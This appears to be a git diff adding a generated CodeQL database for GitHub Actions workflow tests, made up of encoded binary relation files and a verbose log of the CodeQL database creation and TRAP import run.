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 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff GIT binary patch literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. +[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + }, + "python_executable_name" : { + "title" : "Controls the name of the Python executable used by the Python extractor.", + "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. Use this setting with caution, the Python extractor requires Python 3 to run.\n", + "type" : "string", + "pattern" : "^(py|python|python3)$" + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the extractor. The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). +[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. +[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. +[2024-03-01 13:05:58] Plumbing command codeql database init completed. +[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] +[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. +[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] +[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. +[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... +[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist +[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 +[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. +[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files +[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) +[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) +[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) +[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) +[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) +[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) +[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) +[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) +[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) +[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) +[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) +[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) +[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) +[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) +[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) +[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) +[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) +[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) +[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) +[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) +[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) +[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) +[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) +[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 of 27) +[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations +[2024-03-01 13:05:59] Merging 1 fragment for 'files'. +[2024-03-01 13:05:59] Merged 208 bytes for 'files'. +[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. +[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. +[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. +[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. +[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. +[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. +[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. +[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Saving string and id pools to disk. +[2024-03-01 13:05:59] Finished importing TRAP files. +[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. +[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) +[2024-03-01 13:05:59] String pool size: 2.06 MiB +[2024-03-01 13:05:59] ID pool size: 1.08 MiB +[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). +[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-03-01 13:05:59] The disk cache is 